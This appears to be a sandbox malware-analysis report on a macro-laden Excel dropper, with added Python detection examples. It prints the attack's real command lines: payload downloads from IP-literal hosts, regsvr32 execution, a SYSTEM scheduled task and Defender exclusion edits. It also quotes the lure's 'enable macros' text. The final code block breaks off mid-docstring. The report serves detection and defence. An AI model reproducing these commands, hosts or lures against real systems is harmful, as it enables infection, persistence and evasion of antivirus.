
Windows Analysis Report Compensation-2308017-09272021.xls

Overview

General Information

Sample Name:Compensation-2308017-09272021.xls
Analysis ID:491573
MD5:52b4fcf57e4fb524cf33503e8a5272ef
SHA1:d5b80e8ceaa81361da9ff6d18a4927dfd3b47d1a
SHA256:a5bc073043d0729f825df8302f425148ce8c65214a87094fe96fe9039ac7f088
Tags:xls

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Office process drops PE file
Writes to foreign memory regions
Uses cmd line tools excessively to alter registry or file data
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
PE file has nameless sections
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Drops PE files to the user root directory
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Document contains embedded VBA macros
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2712 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1980 cmdline: regsvr32 -silent ..\Drezd.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1312 cmdline: -silent ..\Drezd.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2124 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
          • schtasks.exe (PID: 2592 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • regsvr32.exe (PID: 3040 cmdline: regsvr32 -silent ..\Drezd1.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1760 cmdline: -silent ..\Drezd1.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 2988 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • WMIADAP.exe (PID: 2988 cmdline: wmiadap.exe /F /T /R MD5: 005247E3057BC5D5C3F8C6F886FFC10C)
    • regsvr32.exe (PID: 2520 cmdline: regsvr32 -silent ..\Drezd2.red MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 3060 cmdline: -silent ..\Drezd2.red MD5: 432BE6CF7311062633459EEF6B242FB5)
        • explorer.exe (PID: 284 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
  • regsvr32.exe (PID: 2848 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2952 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
      • explorer.exe (PID: 2544 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
        • reg.exe (PID: 2976 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
        • reg.exe (PID: 2132 cmdline: C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Gnydpduzkfqu' /d '0' MD5: 9D0B3066FE3D1FD345E86BC7BCCED9E4)
  • regsvr32.exe (PID: 1704 cmdline: regsvr32.exe -s 'C:\Users\user\Drezd.red' MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2076 cmdline: -s 'C:\Users\user\Drezd.red' MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: Compensation-2308017-09272021.xls
Rule: JoeSecurity_HiddenMacro
Description: Yara detected hidden Macro 4.0 in Excel
Author: Joe Security
Strings: (none listed)

    Sigma Overview

    System Summary:

    Sigma detected: Microsoft Office Product Spawning Windows Shell
    Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: regsvr32 -silent ..\Drezd.red, CommandLine: regsvr32 -silent ..\Drezd.red, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2712, ProcessCommandLine: regsvr32 -silent ..\Drezd.red, ProcessId: 1980
    Sigma detected: Regsvr32 Command Line Without DLL
    Source: Process started | Author: Florian Roth | Data: Command: -silent ..\Drezd.red, CommandLine: -silent ..\Drezd.red, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -silent ..\Drezd.red, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1980, ProcessCommandLine: -silent ..\Drezd.red, ProcessId: 1312

    Persistence and Installation Behavior:

    Sigma detected: Schedule system process
    Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2124, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16, ProcessId: 2592
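    The three Sigma hits above, together with the reg.exe Defender-exclusion writes and the regsvr32.exe -> explorer.exe step visible in the process tree, reduce to a handful of predicates over process-creation events. What follows is an added example, not Joe Sandbox or Sigma project code: it evaluates such predicates over events transcribed from the process tree. The event field names are assumed, the benign control event (PID 4242, the "Vendor" paths) is invented, and the regsvr32 rule is a simplification of the published Sigma logic (the real rule carries additional exclusions).

```python
import ntpath

# Constructed process-creation events transcribed from the process tree in this
# report; field names are assumed. PID 4242 is an invented benign control.
SAMPLE_EVENTS = [
    {"pid": 1980, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 -silent ..\Drezd.red",
     "parent_image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"},
    {"pid": 1312, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r"-silent ..\Drezd.red",
     "parent_image": r"C:\Windows\System32\regsvr32.exe"},
    {"pid": 2124, "image": r"C:\Windows\SysWOW64\explorer.exe",
     "cmdline": r"C:\Windows\SysWOW64\explorer.exe",
     "parent_image": r"C:\Windows\SysWOW64\regsvr32.exe"},
    {"pid": 2592, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"""'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn icvxxob /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 18:04 /ET 18:16""",
     "parent_image": r"C:\Windows\SysWOW64\explorer.exe"},
    {"pid": 2976, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r"""C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Tououa' /d '0'""",
     "parent_image": r"C:\Windows\SysWOW64\explorer.exe"},
    {"pid": 4242, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll",
     "parent_image": r"C:\Program Files\Vendor\setup.exe"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
          "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}


def base(path):
    """Lower-cased image file name; ntpath handles backslashes on any host OS."""
    return ntpath.basename(path).lower()


def office_spawns_shell(ev):
    return base(ev["parent_image"]) in OFFICE_APPS and base(ev["image"]) in SHELLS


def regsvr32_without_dll(ev):
    # Simplified form of the Sigma rule hit above: regsvr32 whose command line
    # names no .dll at all (here the payload is a .red file).
    return base(ev["image"]) == "regsvr32.exe" and ".dll" not in ev["cmdline"].lower()


def schtasks_as_system(ev):
    c = ev["cmdline"].lower()
    return (base(ev["image"]) == "schtasks.exe" and "/create" in c
            and r"nt authority\system" in c)


def defender_exclusion_via_reg(ev):
    c = ev["cmdline"].lower()
    return (base(ev["image"]) == "reg.exe" and " add " in c
            and r"windows defender\exclusions" in c)


def explorer_spawned_by_regsvr32(ev):
    # Not one of the report's Sigma rules; added from the process tree, where
    # every injected explorer.exe has a regsvr32.exe parent.
    return base(ev["image"]) == "explorer.exe" and base(ev["parent_image"]) == "regsvr32.exe"


RULES = {
    "office_spawns_shell": office_spawns_shell,
    "regsvr32_without_dll": regsvr32_without_dll,
    "schtasks_as_system": schtasks_as_system,
    "defender_exclusion_via_reg": defender_exclusion_via_reg,
    "explorer_spawned_by_regsvr32": explorer_spawned_by_regsvr32,
}


def evaluate(events, rules=RULES):
    """Return (rule name, pid) for every event each rule matches."""
    hits = []
    for ev in events:
        for name, fn in rules.items():
            if fn(ev):
                hits.append((name, ev["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in evaluate(SAMPLE_EVENTS):
        print(f"{rule:32s} pid={pid}")
```

    The control event with a real .dll argument and a non-Office parent produces no hit; the five transcribed events produce six, because the regsvr32 rule fires on both the 64-bit parent (PID 1980) and the 32-bit child (PID 1312), whereas the report shows the Sigma hit on 1312 only.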

    Jbx Signature Overview


    AV Detection:

    Machine Learning detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat | Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat | Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat | Joe Sandbox ML: detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: amstream.pdb source: explorer.exe, 00000005.00000003.441003457.0000000002821000.00000004.00000001.sdmp
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0008AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 8_2_1000AEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 11_2_000EAEB4 FindFirstFileW,FindNextFileW,
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 12_2_1000AEB4 FindFirstFileW,FindNextFileW,

    Software Vulnerabilities:

    Document exploit detected (drops PE files)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: 44466.7516903935[1].dat.0.dr
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
    Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 190.14.37.178:80 (listed twice in the report)
    Source: excel.exe | Memory has grown: Private usage: 4MB later: 33MB
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:02:56 GMTContent-Type: application/octet-streamContent-Length: 387072Connection: keep-aliveX-Powered-By: PHP/5.4.16Accept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment; filename="44466.7516903935.dat"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 85 8c 3b 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 03 01 00 0a 03 00 00 f6 01 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 03 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 20 03 00 70 00 00 00 c8 10 04 00 7c 01 00 00 00 20 04 00 f4 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 09 03 00 00 10 00 00 00 0a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 65 64 61 74 61 00 00 70 00 00 00 00 20 03 00 00 02 00 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 20 00 00 00 30 03 00 00 14 00 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 61 74 61 00 00 00 54 bf 00 00 00 50 03 00 00 c0 00 00 00 24 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 
74 00 48 06 00 00 00 10 04 00 00 08 00 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f4 0b 01 00 00 20 04 00 00 0c 01 00 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 50 00 00 00 30 05 00 00 50 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 80 05 00 00 50 00 00 00 48 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 50 00 00 00 d0 05 00 00 50 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK, Server: nginx, Date: Mon, 27 Sep 2021 16:02:59 GMT, Content-Type: application/octet-stream, Content-Length: 387072, Connection: keep-alive, X-Powered-By: PHP/5.4.16, Accept-Ranges: bytes, Expires: 0, Cache-Control: no-cache, no-store, must-revalidate, Content-Disposition: attachment; filename="44466.7516903935.dat" (raw data identical to the response above)
    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK, Server: nginx, Date: Mon, 27 Sep 2021 16:03:00 GMT, Content-Type: application/octet-stream, Content-Length: 387072, Connection: keep-alive, X-Powered-By: PHP/5.4.16, Accept-Ranges: bytes, Expires: 0, Cache-Control: no-cache, no-store, must-revalidate, Content-Disposition: attachment; filename="44466.7516903935.dat" (raw data identical to the response above)
    Source: global trafficHTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.178Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.96.67Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /44466.7516903935.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.250.148.213Connection: Keep-Alive
    Source: unknown | TCP traffic detected without corresponding DNS query: 190.14.37.178 (this entry is repeated 50 times in the report)
    Source: regsvr32.exe, 00000004.00000002.440286146.0000000002100000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.722386782.0000000000820000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.441359204.0000000001DB0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.439921319.0000000001D00000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.451658912.0000000001CF0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.448814500.0000000001C80000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000004.00000002.440286146.0000000002100000.00000002.00020000.sdmp, explorer.exe, 00000005.00000002.722386782.0000000000820000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.449319415.0000000002170000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat
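    The download phase above has three markers that do not depend on the particular addresses: the Host header is an IP literal (which is why no DNS query precedes the connections), the response body starts with an MZ header while Content-Type and Content-Disposition present it as a generic .dat attachment, and the same URI path is fetched from three different servers, which is the behaviour of a stage-two loader walking a fallback list. The following is an added example, my own code rather than part of the report, that checks those three markers over flows constructed from the request and response headers above. The header set is abridged, the body is truncated to the first 16 bytes of the dump, and the control flow against downloads.example.net is invented.

```python
import ipaddress
import re
from collections import defaultdict

# First 16 bytes of the response body as dumped above (PE image, "MZ" magic).
MZ_PREFIX = bytes.fromhex("4d5a90000300000004000000ffff0000")
UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; "
      "Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E)")


def _get(host):
    """Request as captured above, with the Host header parameterised."""
    return (f"GET /44466.7516903935.dat HTTP/1.1\r\nAccept: */*\r\nUA-CPU: AMD64\r\n"
            f"User-Agent: {UA}\r\nHost: {host}\r\nConnection: Keep-Alive\r\n\r\n")


RESPONSE = ("HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: application/octet-stream\r\n"
            "Content-Length: 387072\r\nX-Powered-By: PHP/5.4.16\r\n"
            'Content-Disposition: attachment; filename="44466.7516903935.dat"\r\n\r\n')

# Constructed flows: the three GETs from the report plus one invented benign control.
SAMPLE_FLOWS = [
    {"request": _get("190.14.37.178"), "response": RESPONSE, "body": MZ_PREFIX},
    {"request": _get("185.183.96.67"), "response": RESPONSE, "body": MZ_PREFIX},
    {"request": _get("185.250.148.213"), "response": RESPONSE, "body": MZ_PREFIX},
    {"request": "GET /pkg/tool.zip HTTP/1.1\r\nHost: downloads.example.net\r\n"
                "User-Agent: curl/7.68.0\r\n\r\n",
     "response": "HTTP/1.1 200 OK\r\nContent-Type: application/zip\r\n\r\n",
     "body": b"PK\x03\x04"},
]

EXECUTABLE_EXT = {".exe", ".dll", ".scr", ".cpl", ".ocx", ".sys"}


def parse_message(raw):
    """Split an HTTP request or response into (start line, lower-cased header dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers


def request_path(start_line):
    parts = start_line.split()
    return parts[1] if len(parts) > 1 else ""


def is_ip_literal(host):
    # Strips a trailing :port; IPv6 bracket syntax is not handled here.
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def inspect_flow(flow):
    """Per-flow findings: IP-literal host, PE body, PE body behind a non-PE name."""
    findings = []
    req_line, req = parse_message(flow["request"])
    _, resp = parse_message(flow["response"])
    if is_ip_literal(req.get("host", "")):
        findings.append("host_is_ip_literal")
    if flow["body"][:2] == b"MZ":
        findings.append("body_is_pe_image")
        match = re.search(r'filename="?([^";]+)', resp.get("content-disposition", ""))
        name = match.group(1) if match else request_path(req_line)
        ext = name[name.rfind("."):].lower() if "." in name else ""
        if ext not in EXECUTABLE_EXT:
            findings.append("pe_served_with_non_executable_extension")
    return findings


def cross_flow_findings(flows):
    """Paths fetched from two or more distinct IP-literal hosts (fallback server list)."""
    hosts_by_path = defaultdict(set)
    for flow in flows:
        req_line, req = parse_message(flow["request"])
        host = req.get("host", "")
        if is_ip_literal(host):
            hosts_by_path[request_path(req_line)].add(host)
    return {path: sorted(hosts) for path, hosts in hosts_by_path.items() if len(hosts) >= 2}


if __name__ == "__main__":
    for flow in SAMPLE_FLOWS:
        print(parse_message(flow["request"])[1].get("host"), inspect_flow(flow))
    print(cross_flow_findings(SAMPLE_FLOWS))
```

    The per-flow checks are what a proxy with body inspection can do on a single transaction; the cross-flow check needs the session store, and is the one that separates a loader's retry list from a one-off download from a bare IP.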

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4 | Screenshot OCR: Enable editing" in the yellow bar 19 above. 20 example of notification 22 ( 0 pRoTEcTmwARNNG This
    Source: Screenshot number: 4 | Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the 26 docume
    Source: Screenshot number: 4 | Screenshot OCR: Enable Macros ) 30 31 32 :: Why I can not open this document? 35 36 - You are using iOS or And
    Source: Document image extraction number: 0 | Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 PROTECTEDWARNING This file o
    Source: Document image extraction number: 0 | Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 0 | Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Source: Document image extraction number: 1 | Screenshot OCR: Enable editing" in the yellow bar above. example of notification ( 0 pRoTEcTmwARNNG Thisfileorigi
    Source: Document image extraction number: 1 | Screenshot OCR: Enable Content" to perform Microsoft Excel Decryption Core to start the decryption of the document.
    Source: Document image extraction number: 1 | Screenshot OCR: Enable Macros ) Why I can not open this document? - You are using iOS or Android device. Please us
    Office process drops PE file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[2].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[3].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd1.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd.red
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44466.7516903935[1].dat
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Drezd2.red
    PE file has nameless sections
    Source: 44466.7516903935[1].dat.0.dr | Static PE information: section name: (empty; three such sections reported)
    Source: Drezd.red.0.dr | Static PE information: section name: (empty; three such sections reported)
    Source: 44466.7516903935[2].dat.0.dr | Static PE information: section name: (empty; three such sections reported)
    Source: Drezd1.red.0.dr | Static PE information: section name: (empty; three such sections reported)
    Source: 44466.7516903935[3].dat.0.dr | Static PE information: section name: (empty; three such sections reported)
    Source: Drezd2.red.0.dr | Static PE information: section name: (empty; three such sections reported)
    Source: Drezd.red.5.dr | Static PE information: section name: (empty; three such sections reported)
    Source: Drezd1.red.11.dr | Static PE information: section name: (empty; three such sections reported)
    Source: Drezd.red.14.dr | Static PE information: section name: (empty; three such sections reported)
    Source: Drezd2.red.17.dr | Static PE information: section name: (empty; three such sections reported)
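    The nameless-section entries above, and the "PE file does not import any functions" and "PE file contains sections with non-standard names" signatures from the list at the top, are cheap static checks on the section table and the optional header's data directories; no disassembly is needed. The following is an added example, not Joe Sandbox code: it builds a synthetic PE32 DLL header whose section names follow the dump above (six named sections followed by three with all-zero names), then runs those checks over it using only the standard library. Every header value, the clean control layout, and the set of "standard" section names are my own constructions; the section-table field layout is the documented PE format.

```python
import struct

STANDARD_SECTION_NAMES = {
    b".text", b".data", b".rdata", b".bss", b".idata", b".edata", b".rsrc",
    b".reloc", b".tls", b".pdata", b".CRT", b".xdata", b".didat",
}

# (name, characteristics): constructed to mirror the dump above, six named
# sections and then three with all-zero names (0xC0000000 = read + write).
SAMPLE_SECTIONS = [
    (b".text", 0x60000020), (b".edata", 0x40000040), (b".data", 0xC0000040),
    (b".data", 0xC0000040), (b".rdata", 0xC0000040), (b".rsrc", 0x40000040),
    (b"", 0xC0000000), (b"", 0xC0000000), (b"", 0xC0000000),
]
CLEAN_SECTIONS = [(b".text", 0x60000020), (b".rdata", 0x40000040), (b".data", 0xC0000040)]


def build_sample_pe(sections, with_imports=False):
    """Synthetic PE32 DLL, headers only: DOS stub, COFF header, optional header,
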